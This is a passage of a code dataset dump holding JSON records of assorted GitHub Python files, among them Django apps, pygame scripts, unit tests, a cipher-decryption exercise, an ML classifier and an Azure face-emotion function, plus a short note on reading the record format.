'{0.transaction}-{0.property_type}-{0.city}'.format(args)\n\n client = MongoClient('localhost', 27017)\n db = client.advert_db\n collection = db[key]\n\n def get_advert_func(advert_id):\n return collection.find_one({'advert_id': advert_id})\n\n async with aiohttp.ClientSession() as session:\n scraper_config = ScraperConfig(\n session,\n args.transaction,\n args.property_type,\n args.city,\n distance=args.distance\n )\n\n found = 0\n updated = 0\n created = 0\n\n advert_iterator = AdvertIterator(\n scraper_config,\n days_treshold=args.days_limit,\n page_from=args.page_from,\n page_to=args.page_to,\n get_advert_func=get_advert_func,\n skip_if_advert_exists=args.all\n )\n async for advert, advert_number in advert_iterator:\n\n result = collection.update_one(\n {'advert_id': advert.advert_id},\n {'$set': advert.to_dict()},\n True\n )\n if result.matched_count > 0:\n found += 1\n\n if result.upserted_id:\n created += 1\n else:\n updated += 1\n\n print('[{}] {}: {}'.format(key, advert_number, advert.link))\n\n print(f'Found: {found}\\nUpdated: {updated}\\nCreated: {created}')\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n","repo_name":"miszczu-blady/crisis-stats","sub_path":"scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} 
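Each "+" line in this patch is one self-contained JSON record: the "text" field carries a single escaped source file, and the remaining keys ("seq_id", "repo_name", "sub_path", "program_lang", "stars", and so on) describe where it was captured. A minimal sketch for walking such an archive, assuming a local copy saved under the stand-in name records.jsonl (iter_records is an illustrative helper defined here, not a library call):

import json

def iter_records(path):
    # One JSON object per line; blank lines are skipped defensively.
    with open(path, encoding="utf-8") as fp:
        for line in fp:
            line = line.strip()
            if line:
                yield json.loads(line)

for rec in iter_records("records.jsonl"):
    # "text" is the raw file body; the other keys are provenance metadata.
    print(rec["repo_name"], rec["sub_path"], rec["program_lang"], rec["stars"])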
+{"seq_id":"24413618425","text":"from csv import reader\nfrom settings import tile_size\nimport pygame\nimport sys\nimport os\n\n\ndef import_folder(path):\n surface_list = []\n\n for _, __, image_files in os.walk(path):\n for image in image_files:\n full_path = path + '/' + image\n full_path = resource_path(full_path)\n image_surf = pygame.image.load(full_path).convert_alpha()\n surface_list.append(image_surf)\n\n return surface_list\n\n\ndef import_csv_layout(path):\n terrain_map = []\n with open(path) as map:\n level = reader(map, delimiter=',')\n for row in level:\n terrain_map.append(list(row))\n return terrain_map\n\n\ndef import_cut_graphics(path):\n surface = pygame.image.load(path).convert_alpha()\n tile_num_x = int(surface.get_size()[0] / tile_size)\n tile_num_y = int(surface.get_size()[1] / tile_size)\n\n cut_tiles = []\n for row in range(tile_num_y):\n for col in range(tile_num_x):\n x = col * tile_size\n y = row * tile_size\n new_surf = pygame.Surface((tile_size, tile_size), flags=pygame.SRCALPHA)\n new_surf.blit(surface, (0, 0), pygame.Rect(x, y, tile_size, tile_size))\n cut_tiles.append(new_surf)\n\n return cut_tiles\n\n\ndef resource_path(relative_path):\n try:\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath(\".\")\n\n return os.path.join(base_path, relative_path)\n","repo_name":"esquaredj/RaspberryPyGame","sub_path":"support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"35828170701","text":"# hello_file = open(\"hello.txt\", \"w\")\n# ga_intro = \"Hello GA\"\n# hello_file.write(ga_intro)\n# # print(hello_file.read())\n# hello_file.close()\n\n# car_file = open(\"car.txt\", \"w\")\n# new_car_list = \"Tesla Model S\\nMercedes C300\\nToyota Camry\"\n# car_file.write(new_car_list)\n# # print(car_file.read())\n# car_file.close()\n\n# my_new_file = open('person.txt', 'r+')\n# my_new_file.write(\"nikki\\nruben\\nsimone\")\n# # print(my_new_file.readlines())\n# my_new_file.close()\n\n# with open('person.txt') as peoples:\n# people_list= peoples.readlines()\n\n# for each_person in people_list:\n# print(each_person)\n\n\n\n# person_file = open('person.txt')\n# print(person_file.read())\n# person_file.close()\n\n# with open('person.txt', 'w') as person_file:\n# person_file.write('Ruben')\n\n# #append to a file\n# with open('person.txt', 'a') as person_file:\n# person_file.write('\\nRome')\n\n# with open('person.txt', 'r+') as person_file:\n# # print(person_file.read())\n# # person_file.write('\\nYvonne')\n# print(person_file.read())\n\n# with open('hello.txt', 'w+') as hello_file:\n# print(hello_file.read())\n\nwith open('one_to_hundred.txt') as numbers:\n number_list = numbers.readlines()\n result = []\n for each_number in number_list:\n if 'Five' in each_number:\n result.append(each_number)\n elif 'Fifteen' in each_number:\n result.append(each_number)\n else: continue\n print(result)\n\n# with open('prime_numbers.txt') as numbers:\n# number_list = numbers.readlines()\n\n# for each_number in number_list:\n# new_num = (int(each_number) * 2)\n# print(new_num)","repo_name":"NikkiHmltn/python-scripting","sub_path":"myscript.py","file_name":"myscript.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26531008841","text":"import json\n\n# 3rd party libs\nfrom 
flask_api import status\nfrom hpOneView.exceptions import HPOneViewException\nfrom hpOneView.resources.servers.server_hardware import ServerHardware\nfrom unittest import mock\n\n# Module libs\nfrom oneview_redfish_toolkit.api.redfish_json_validator import \\\n RedfishJsonValidator\nfrom oneview_redfish_toolkit.blueprints import \\\n network_device_function_collection\nfrom oneview_redfish_toolkit.tests.base_flask_test import BaseFlaskTest\n\n\nclass TestNetworkDeviceFunctionCollection(BaseFlaskTest):\n \"\"\"Tests for NetworkDeviceFunctionCollection blueprint\"\"\"\n\n @classmethod\n def setUpClass(self):\n super(TestNetworkDeviceFunctionCollection, self).setUpClass()\n\n self.app.register_blueprint(\n network_device_function_collection.\n network_device_function_collection)\n\n # Loading server_hardware mockup value\n with open(\n 'oneview_redfish_toolkit/mockups/oneview/'\n 'ServerHardware.json'\n ) as f:\n self.server_hardware = json.load(f)\n\n def test_get_network_device_function_collection(self):\n \"\"\"Tests NetworkDeviceFunctionCollection\"\"\"\n\n # Loading NetworkDeviceFunctionCollection mockup result\n with open(\n 'oneview_redfish_toolkit/mockups/redfish/'\n 'NetworkDeviceFunctionCollection.json'\n ) as f:\n network_device_function_collection_mockup = json.load(f)\n\n # Create mock response\n serverhw_obj = ServerHardware(\n self.oneview_client, self.server_hardware)\n self.oneview_client.server_hardware.get_by_id.return_value = \\\n serverhw_obj\n\n # Get NetworkDeviceFunctionCollection\n response = self.client.get(\n \"/redfish/v1/Chassis/30303437-3034-4D32-3230-313133364752/\"\n \"NetworkAdapters/3/NetworkDeviceFunctions/\"\n )\n\n # Gets json from response\n result = json.loads(response.data.decode(\"utf-8\"))\n\n # Tests response\n self.assertEqual(status.HTTP_200_OK, response.status_code)\n self.assertEqual(\"application/json\", response.mimetype)\n self.assertEqualMockup(network_device_function_collection_mockup,\n result)\n\n def test_get_network_device_function_collection_sh_not_found(self):\n \"\"\"Tests NetworkDeviceFunctionCollection\"\"\"\n\n e = HPOneViewException({\n 'errorCode': 'RESOURCE_NOT_FOUND',\n 'message': 'server-hardware not found',\n })\n self.oneview_client.server_hardware.get_by_id.side_effect = e\n\n # Get NetworkDeviceFunctionCollection\n response = self.client.get(\n \"/redfish/v1/Chassis/30303437-3034-4D32-3230-313133364752/\"\n \"NetworkAdapters/3/NetworkDeviceFunctions/\"\n )\n\n self.assertEqual(status.HTTP_404_NOT_FOUND, response.status_code)\n self.assertEqual(\"application/json\", response.mimetype)\n\n def test_get_network_device_function_collection_sh_exception(self):\n \"\"\"Tests NetworkDeviceFunctionCollection\"\"\"\n\n e = HPOneViewException({\n 'errorCode': 'ANOTHER_ERROR',\n 'message': 'server-hardware-types error',\n })\n self.oneview_client.server_hardware.get_by_id.side_effect = e\n\n # Get NetworkDeviceFunctionCollection\n response = self.client.get(\n \"/redfish/v1/Chassis/30303437-3034-4D32-3230-313133364752/\"\n \"NetworkAdapters/3/NetworkDeviceFunctions/\"\n )\n\n self.assertEqual(\n status.HTTP_500_INTERNAL_SERVER_ERROR,\n response.status_code\n )\n self.assertEqual(\"application/json\", response.mimetype)\n\n @mock.patch.object(RedfishJsonValidator, \"get_resource_by_id\")\n def test_get_network_device_function_collection_empty(self,\n get_resource_by_id):\n \"\"\"Tests NetworkDeviceFunctionCollection with empty list\"\"\"\n\n # Loading NetworkDeviceFunctionCollectionEmpty mockup result\n with open(\n 
'oneview_redfish_toolkit/mockups/redfish/'\n 'NetworkDeviceFunctionCollectionEmpty.json'\n ) as f:\n network_device_function_collection_mockup = json.load(f)\n\n # Create mock response\n serverhw_obj = ServerHardware(\n self.oneview_client, self.server_hardware)\n self.oneview_client.server_hardware.get_by_id.return_value = \\\n serverhw_obj\n\n # Get NetworkDeviceFunctionCollection\n response = self.client.get(\n \"/redfish/v1/Chassis/30303437-3034-4D32-3230-313133364752/\"\n \"NetworkAdapters/3/NetworkDeviceFunctions/\"\n )\n\n # Gets json from response\n result = json.loads(response.data.decode(\"utf-8\"))\n\n # Tests response\n self.assertEqual(status.HTTP_200_OK, response.status_code)\n self.assertEqual(\"application/json\", response.mimetype)\n self.assertEqualMockup(network_device_function_collection_mockup,\n result)\n","repo_name":"HewlettPackard/oneview-redfish-toolkit","sub_path":"oneview_redfish_toolkit/tests/blueprints/test_network_device_function_collection.py","file_name":"test_network_device_function_collection.py","file_ext":"py","file_size_in_byte":5085,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"6"} +{"seq_id":"17549472746","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"about/\", views.about, name=\"about\"),\n path(\"rooms/\", views.rooms, name=\"rooms\"),\n path(\"help/\", views.room, name=\"help\"),\n path(\"contact/\", views.room, name=\"contact\"),\n path(\"room//\", views.room, name=\"viewRoom\"),\n]\n","repo_name":"mamin11/django-hotel","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"38903174194","text":"import chainer\nfrom chainer import links as L, functions as F, reporter\n\n\nclass TextClassifier(chainer.Chain):\n\n \"\"\"A classifier using a given encoder.\n\n This chain encodes a sentence and classifies it into classes.\n\n Args:\n encoder (Link): A callable encoder, which extracts a feature.\n Input is a list of variables whose shapes are\n \"(sentence_length, )\".\n Output is a variable whose shape is \"(batchsize, n_units)\".\n n_class (int): The number of classes to be predicted.\n\n \"\"\"\n\n def __init__(self, encoder, n_class, dropout=0.1):\n super(TextClassifier, self).__init__()\n with self.init_scope():\n self.encoder = encoder\n self.output = L.Linear(encoder.out_units, n_class)\n self.dropout = dropout\n\n def __call__(self, xs, ys):\n concat_outputs = self.predict(xs)\n concat_truths = F.concat(ys, axis=0)\n\n loss = F.softmax_cross_entropy(concat_outputs, concat_truths)\n accuracy = F.accuracy(concat_outputs, concat_truths)\n reporter.report({'loss': loss.data}, self)\n reporter.report({'accuracy': accuracy.data}, self)\n return loss\n\n def predict(self, xs, softmax=False, argmax=False):\n concat_encodings = F.dropout(self.encoder(xs), ratio=self.dropout)\n concat_outputs = self.output(concat_encodings)\n if softmax:\n return F.softmax(concat_outputs).data\n elif argmax:\n return self.xp.argmax(concat_outputs.data, axis=1)\n else:\n return concat_outputs","repo_name":"elangovana/sentimentanalysis-chainer-sagemaker","sub_path":"custom_chainer/TextClassifier.py","file_name":"TextClassifier.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} 
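The provenance fields carried by each record are also enough to materialize a captured file back on disk. A sketch under the same assumptions as the reader above (extract_file is an illustrative helper, and the output directory name "extracted" is arbitrary):

import os

def extract_file(rec, out_dir="extracted"):
    # Rebuild the original layout as out_dir/<repo_name>/<sub_path>.
    dest = os.path.join(out_dir, rec["repo_name"], rec["sub_path"])
    os.makedirs(os.path.dirname(dest), exist_ok=True)
    # newline="" keeps any \r\n line endings embedded in "text" intact.
    with open(dest, "w", encoding="utf-8", newline="") as fp:
        fp.write(rec["text"])
    return dest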
+{"seq_id":"72532095549","text":"import sqlalchemy as sa\n\nfrom ..tables import users\nfrom ._base import BaseRepository\n\n\nclass UsersRepository(BaseRepository):\n async def get_email_from_user_id(self, user_id: int) -> str | None:\n stmt = sa.select(\n [\n users.c.email,\n ]\n ).where(users.c.id == user_id)\n async with self.db_engine.acquire() as conn:\n email: str | None = await conn.scalar(stmt)\n return email\n","repo_name":"ITISFoundation/osparc-simcore","sub_path":"services/api-server/src/simcore_service_api_server/db/repositories/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"6"} +{"seq_id":"27950634817","text":"import string\n\ndef main():\n \n print(\"-This program decrypts cipher text from a double transposition cipher.\")\n print(\"-The program is provided two keys from unwrappedKeys.txt and cipher text from AliceCipherText.txt\")\n \n keys = get_keys()\n print(\"Keys to be used: \" + keys[0] + \", \" + keys[1])\n \n ciphertext = read_file(\"AliceCipherText.txt\")\n print(\"Cipher text to be decrypted: \" + ciphertext)\n \n plaintext1 = decrypt(ciphertext, keys[1])\n plaintext2 = decrypt(plaintext1, keys[0])\n \n plaintext_final = remove_xx(plaintext2)\n \n print(\"Decrypted message: \" + plaintext_final)\n write_file(\"decryptedMessage.txt\", plaintext_final)\n print(\"Decrypted message written to decryptedMessage.txt\")\n\ndef get_keys():\n \n key_text = read_file(\"unwrappedKeys.txt\")\n keys = [None, None]\n key1 = \"\"\n key2 = \"\"\n \n for char in key_text:\n if char is ' ':\n break\n else:\n key1 += char\n \n for char in key_text[key_text.index(' '):]:\n if char is ' ':\n continue\n else:\n key2 += char\n \n keys[0] = key1\n keys[1] = key2\n \n return keys\n \ndef read_file(filename):\n \n file = open(filename, \"r\")\n if file.mode == \"r\":\n plaintext = file.read()\n \n new_plaintext = \"\"\n \n for char in plaintext:\n if char is '\\n' or char is '.':\n continue\n else:\n new_plaintext = new_plaintext + char\n \n file.close()\n return new_plaintext\n\ndef write_file(filename, contents):\n \n file = open(filename, \"w\")\n file.write(contents)\n file.close()\n \ndef get_order(key):\n \n ordering = list()\n for i in range(0,10):\n ordering.append(0)\n \n for i in range(0,10):\n ordering[i] = string.ascii_lowercase.index(key[i]) + 1\n \n finished = False\n ordering_temp = ordering[:]\n rank = 1\n while finished is False:\n minimum = min(ordering_temp)\n index = ordering.index(minimum)\n ordering[index] = rank\n rank = rank + 1\n ordering_temp.remove(minimum)\n if not ordering_temp:\n finished = True\n \n return ordering\n\ndef remove_xx(plaintext):\n \n new_text = \"\"\n for i in range(0, len(plaintext)):\n if i + 1 >= len(plaintext):\n break\n elif (plaintext[i] == 'X' and plaintext[i+1] == 'X') or (plaintext[i] == 'X' and plaintext[i-1] == 'X'):\n if new_text[len(new_text)-1] != ' ':\n new_text = new_text + ' '\n continue\n else:\n new_text = new_text + plaintext[i]\n \n new_text = new_text.strip()\n return new_text\n\ndef decrypt(plaintext, key):\n \n transpose = [None, None, None, None, None, None, None, None, None, None]\n \n for i in range(0,10):\n transpose[i] = list()\n \n transpose_depth = int(len(plaintext) / 10)\n \n ordering = get_order(key)\n ordering_place = 1\n \n temp_matrix = [None, None, None, None, None, None, None, None, None, None]\n \n for i in range(0,10):\n temp_matrix[i] = list()\n \n text_index = 0\n temp_matrix_index = 
0\n \n for text_index in range(0, len(plaintext)):\n if len(temp_matrix[temp_matrix_index]) == transpose_depth:\n temp_matrix_index = temp_matrix_index + 1\n \n temp_matrix[temp_matrix_index].append(plaintext[text_index])\n text_index = text_index + 1 \n \n for char_list in temp_matrix:\n transpose_index = ordering.index(ordering_place)\n transpose[transpose_index] = char_list\n if ordering_place == 10:\n break\n else:\n ordering_place = ordering_place + 1\n \n decrypted = \"\"\n \n i = 0\n j = 0\n \n while True:\n if len(decrypted) == transpose_depth * 10:\n break\n if (i > 9) and (j > transpose_depth-1):\n continue\n else:\n decrypted = decrypted + transpose[i][j]\n if (i==9):\n i = 0\n j = j+1\n else:\n i = i + 1\n \n return decrypted\n \nif __name__ == \"__main__\":\n main()","repo_name":"zachklaus/past-projects","sub_path":"Python Projects/RSA/transposition-decr.py","file_name":"transposition-decr.py","file_ext":"py","file_size_in_byte":4165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"11239752194","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom django.db import models\nfrom countries.models import Country\nfrom django.template.defaultfilters import slugify\n\nclass Autor(models.Model):\n pais = models.ForeignKey(Country, blank=True, null=True, related_name='autores')\n nombre = models.CharField(max_length=50)\n apellido = models.CharField(max_length=50)\n \n class Meta:\n db_table='Autor'\n verbose_name='autor'\n verbose_name_plural='autores'\n \n def __unicode__(self):\n return self.nombre + ' ' + self.apellido\n \nclass Pieza(models.Model):\n from usuarios.models import Perfil\n\n codigo = models.CharField(primary_key=True, max_length=20)\n clasificacion = models.ForeignKey('Clasificacion', related_name='piezas')\n autor = models.ForeignKey(Autor, blank=True, null=True, related_name='creaciones')\n responsableRegistro = models.ForeignKey(Perfil, related_name='piezas_registradas')\n registroIDAEH = models.BooleanField(default=False, blank=True)\n codigoIDAEH = models.CharField(max_length=25, blank=True, null=False)\n archivoIDAEH = models.URLField(blank=True, null=True)\n nombre = models.CharField(max_length=140, blank=True)\n descripcion = models.TextField()\n fechaIngreso = models.DateField(auto_now=True)\n procedencia = models.CharField(max_length=50, blank=True)\n pais = models.ForeignKey(Country, blank=True, null=True, related_name='piezas')\n regionCultural = models.SmallIntegerField(blank=True, null=True)\n observaciones = models.TextField(blank=True)\n maestra = models.BooleanField(default=False, blank=True)\n exhibicion = models.BooleanField(default=False, blank =True)\n altura = models.FloatField(blank=True, null=True)\n ancho = models.FloatField(blank=True, null=True)\n grosor = models.FloatField(blank=True, null=True)\n largo = models.FloatField(blank=True, null=True)\n diametro = models.FloatField(blank=True, null=True)\n fechamiento = models.CharField(blank=True, null=True, max_length=100)\n resumen = models.CharField(blank=True, null=True, max_length=140)\n \n class Meta:\n db_table='Pieza'\n verbose_name='pieza'\n verbose_name_plural='piezas'\n \n def get_profile_image(self):\n try:\n foto = Fotografia.objects.filter(pieza = self).all()\n return foto.get(perfil=True).ruta\n except:\n return \"\"\n def get_categoria(self):\n return unicode(self.clasificacion.categoria)\n \n def get_coleccion(self):\n return unicode(self.clasificacion.coleccion)\n \n def get_clasificacion(self):\n return 
unicode(self.clasificacion)\n def __unicode__(self):\n return self.codigo\n \n def get_statistcs(self):\n colecciones = {}\n colecciones['colecciones'] = Coleccion.objects.count()\n colecciones['clasificaciones'] = Clasificacion.objects.count()\n colecciones['categorias'] = Categoria.objects.count()\n colecciones['piezas'] = Pieza.objects.count()\n return colecciones\n \nclass Fotografia(models.Model):\n from operaciones.models import Mantenimiento\n mantenimiento = models.ForeignKey(Mantenimiento, blank=True, null=True, related_name='fotografias')\n pieza = models.ForeignKey('Pieza', blank=True, null=True)\n tipo = models.SmallIntegerField(blank=True)\n ruta = models.URLField()\n perfil = models.BooleanField(default=True)\n \n class Meta:\n db_table='Fotografia'\n verbose_name='fotografía'\n verbose_name_plural='fotografías'\n def __unicode__(self):\n return unicode(self.ruta)\n \nclass Clasificacion(models.Model):\n from registro.models import Ficha\n coleccion = models.ForeignKey('Coleccion', related_name=\"clasificaciones\")\n categoria = models.ForeignKey('Categoria', related_name=\"clasificaciones\")\n ficha = models.ForeignKey(Ficha, null=True, blank=True, related_name=\"clasificaciones\")\n nombre = models.CharField(max_length=50, null=False)\n codigo = models.CharField(max_length=50, unique=True)\n class Meta:\n db_table='Clasificacion'\n verbose_name='clasificación'\n verbose_name_plural = 'clasificaciones'\n \n def __unicode__(self):\n return self.nombre\n\nclass Categoria(models.Model):\n nombre = models.CharField(max_length=50, unique=True)\n colecciones = models.ManyToManyField('Coleccion', through='Clasificacion')\n class Meta: \n db_table='Categoria'\n verbose_name='categoría'\n verbose_name_plural='categorías'\n \n def __unicode__(self):\n return self.nombre\n\nclass Coleccion(models.Model):\n nombre = models.CharField(max_length=50, unique=True)\n categorias = models.ManyToManyField('Categoria', through= 'Clasificacion')\n class Meta:\n db_table='Coleccion'\n verbose_name='Colección'\n verbose_name_plural='Colecciones' \n \n def __unicode__(self):\n return self.nombre","repo_name":"museoXela/API","sub_path":"bicefalo/piezas/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"45010598","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport networkx as nx\n\nfrom sklearn.metrics import pairwise_distances\n\n\ndef create_graph(df_sushi, plot=True, score_par=1, approximate=None):\n\n score_par = 1 / np.median(pairwise_distances(df_sushi))\n metric = lambda x: np.exp(-score_par * pairwise_distances(x, metric=\"euclidean\"))\n similarities = metric(df_sushi.values)\n\n if not approximate is None:\n prova = np.triu(similarities)\n prova = prova[prova != 0]\n true = prova[prova != 1]\n th = np.quantile(true, approximate)\n else:\n th = 0\n\n G = nx.Graph()\n for i, sushi in enumerate(df_sushi.index):\n G.add_node(i, name=i)\n\n for i in range(len(df_sushi)):\n for j in range(len(df_sushi)):\n if i == j or similarities[i, j] < th:\n continue\n attr = {\"weight\": similarities[i, j]}\n # attr = {\"weight\" : 1-similarities[i,j]}\n G.add_edge(i, j, **attr)\n\n if not plot:\n return G, similarities\n\n print(similarities.round(2))\n\n return G, 
similarities\n","repo_name":"MichelangeloConserva/CutFunctionKernel","sub_path":"interleaving/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"21221546020","text":"import azureconfig\nfrom azure.cognitiveservices.vision.face import FaceClient\nfrom msrest.authentication import CognitiveServicesCredentials\n\n\n# noinspection DuplicatedCode\ndef ow_handler(request):\n\n\t# search for image url in request\n\tif request.get('body').get('url') is not None:\n\t\turl = request.get('body').get('url')\n\telse:\n\t\traise Exception('Missing argument in anger detection')\n\n\t# perform image analysis and return response\n\tresult = detect_anger(url)\n\treturn {\n\t\t'value': bool(result)\n\t}\n\n\ndef detect_anger(image) -> bool:\n\n\t# prepare request\n\t# noinspection PyTypeChecker\n\tclient = FaceClient(azureconfig.endpoint, CognitiveServicesCredentials(azureconfig.key))\n\tattributes = [\"emotion\"]\n\tinclude_id = False\n\tinclude_landmarks = False\n\n\t# perform request and analyze result\n\tresponse = client.face.detect_with_url(image, include_id, include_landmarks, attributes, raw=False)\n\tfor result in response:\n\t\tif result.face_attributes.emotion.anger is not None and result.face_attributes.emotion.anger >= 0.6:\n\t\t\treturn True\n\treturn False\n","repo_name":"fmarino-412/ServerlessFlowBench","sub_path":"serverless_functions/openwhisk/python/face_recognition/anger_detection/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"575309128","text":"from graphics import *\r\nfrom time import sleep\r\n\r\n#create a scary image for halloween\r\n# we shall make a Jack'o'Lantern\r\n\r\nwin=GraphWin('Assignment 3 - Problem 3 - Scary Pumpkin',600,400)\r\nwin.setBackground('darkgrey')\r\n\r\npumpkin=Circle(Point(300,200),150)\r\npumpkin.setFill('orange')\r\npumpkin.draw(win)\r\n\r\nleye=Polygon(Point(200,150),Point(250,150),Point(225,200))\r\nleye.setFill('black')\r\nleye.draw(win)\r\n\r\nreye=Polygon(Point(400,150),Point(350,150),Point(375,200))\r\nreye.setFill('black')\r\nreye.draw(win)\r\n\r\nmouth=Polygon(Point(225,250),Point(250,320), Point(300,275),Point(350,320),Point(375,250),Point(300,225))\r\nmouth.setFill('black')\r\nmouth.draw(win)\r\n\r\nstem=Polygon(Point(300,20),Point(310,30),Point(320,60),Point(270,60),Point(300,40))\r\nstem.setFill('green')\r\nstem.draw(win)\r\n\r\n\r\nfor i in range(1000):\r\n stem.move(3,3)\r\n sleep(0.001)\r\n stem.move(-3,-3)\r\n sleep(0.001)\r\n \r\n","repo_name":"MrColwell/PythonProfessionalLearning","sub_path":"PythonForTeachers/studentExercises/A3_3.py","file_name":"A3_3.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43626531804","text":"from typing import List\n\n\nclass Solution(object):\n def numBusesToDestination(self, routes: List[List[int]], source: int, target: int) -> int:\n if source == target:\n return 0\n hashmap = {}\n for i in range(len(routes)):\n for j in range(len(routes[i])):\n if routes[i][j] not in hashmap:\n hashmap[routes[i][j]] = []\n hashmap[routes[i][j]].append(i)\n queue = []\n addedRoute = set()\n addedStop = set()\n for r in hashmap[source]:\n if r in addedRoute: continue\n for i in range(len(routes[r])):\n if routes[r][i] not in addedStop:\n 
queue.append(routes[r][i])\n addedStop.add(routes[r][i])\n addedRoute.add(r)\n count = 0\n while queue:\n size = len(queue)\n count += 1\n for _ in range(size):\n stop = queue.pop(0)\n if stop == target:\n return count\n for r in hashmap[stop]:\n if r in addedRoute: continue\n for i in range(len(routes[r])):\n if routes[r][i] not in addedStop:\n queue.append(routes[r][i])\n addedRoute.add(r)\n return -1\n\n\n\n def test(self):\n testCases = [\n [\n [[1, 2, 7], [3, 6, 7]],\n 1, 6,\n ], # 2\n [\n [[7,12],[4,5,15],[6],[15,19],[9,12,13]],\n 15,12\n ],\n ]\n for routes, s, t in testCases:\n result = self.numBusesToDestination(routes, s, t)\n print('result: %s' % result)\n print('-='*30+'-')\n\n\n\nif __name__ == '__main__':\n Solution().test()\n","repo_name":"MichaelTQ/LeetcodePythonProject","sub_path":"solutions/leetcode_0801_0850/LeetCode815_BusRoutes.py","file_name":"LeetCode815_BusRoutes.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10677337752","text":"from django.shortcuts import render\nimport pandas as pd \nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\n\ndef home(request):\n return render(request, 'home.html')\n\ndef predict(request):\n return render(request, 'predict.html')\n\ndef result(request):\n diabetes_dataset = pd.read_csv('/home/tarib/Desktop/DP1-main/diabetes.csv')\n\n Y = diabetes_dataset['Outcome']\n X = diabetes_dataset.drop('Outcome', axis=1)\n\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n\n model = LogisticRegression(max_iter=1000)\n model.fit(X_train, Y_train)\n\n val1 = float(request.GET['n1'])\n val2 = float(request.GET['n2'])\n val3 = float(request.GET['n3'])\n val4 = float(request.GET['n4'])\n val5 = float(request.GET['n5'])\n val6 = float(request.GET['n6'])\n val7 = float(request.GET['n7'])\n val8 = float(request.GET['n8'])\n\n pred = model.predict([[val1, val2, val3, val4, val5, val6, val7, val8]])\n\n result1 = \"\"\n\n if pred == 1:\n result1 = \"You have diabetes\"\n else:\n result1 = \"You don't have diabetes\"\n\n return render(request, 'predict.html', {\"result2\": result1})\n","repo_name":"biratdatta/DP1-main","sub_path":"diabetesprediction/diabetesprediction/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21315685300","text":"\"\"\" Implementation of ``SDAFile`` for working with SDA files.\n\nThe SDA format was designed to be universal to facilitate data sharing across\nmultiple languages. It supports reading and updating all record types, except\n*function* records. 
It supports writing *numeric*, *logical*, *cell*, and\n*structure* records.\n\n\n\"\"\"\n\nfrom contextlib import contextmanager\nfrom functools import partial\nimport os\nimport os.path as op\nimport re\nimport shutil\nimport tempfile\n\nimport h5py\nimport numpy as np\n\nfrom .extract import extract\nfrom .record_inserter import InserterRegistry\nfrom .utils import (\n    are_signatures_equivalent, error_if_bad_header, error_if_not_writable,\n    get_decoded, is_valid_writable, set_encoded, unnest, unnest_record,\n    update_header, validate_structures, write_header,\n)\n\n\nWRITE_MODES = ('w', 'w-', 'x', 'a')\n\n\nclass SDAFile(object):\n    \"\"\" Read, write, inspect, and manipulate Sandia Data Archive files.\n\n    This supports version 1.1 of the Sandia Data Archive format.\n\n    \"\"\"\n\n    def __init__(self, name, mode='a', **kw):\n        \"\"\" Open an SDA file for reading, writing, or interrogation.\n\n        Parameters\n        ----------\n        name : str\n            The name of the file to be loaded or created.\n        mode : str\n            r         Read-only, file must exist\n            r+        Read/write, file must exist\n            w         Create file, truncate if exists\n            w- or x   Create file, fail if exists\n            a         Read/write if exists, create otherwise (default)\n        kw :\n            Key-word arguments that are passed to the underlying HDF5 file. See\n            h5py.File for options.\n\n        \"\"\"\n        file_exists = op.isfile(name)\n        self._mode = mode\n        self._filename = name\n        self._kw = kw\n        self._registry = InserterRegistry()\n\n        # Check existence\n        if mode in ('r', 'r+') and not file_exists:\n            msg = \"File '{}' does not exist\".format(name)\n            raise IOError(msg)\n\n        # Check the header when mode requires the file to exist\n        if mode in ('r', 'r+') or (file_exists and mode == 'a'):\n            with self._h5file('r') as h5file:\n                error_if_bad_header(h5file)\n\n        # Check that file is writable when mode will write to file.\n        if mode != 'r':\n            with self._h5file('a') as h5file:\n                error_if_not_writable(h5file)\n\n        # Create the header if this is a new file\n        if mode in ('w', 'w-', 'x') or (not file_exists and mode == 'a'):\n            with self._h5file(mode) as h5file:\n                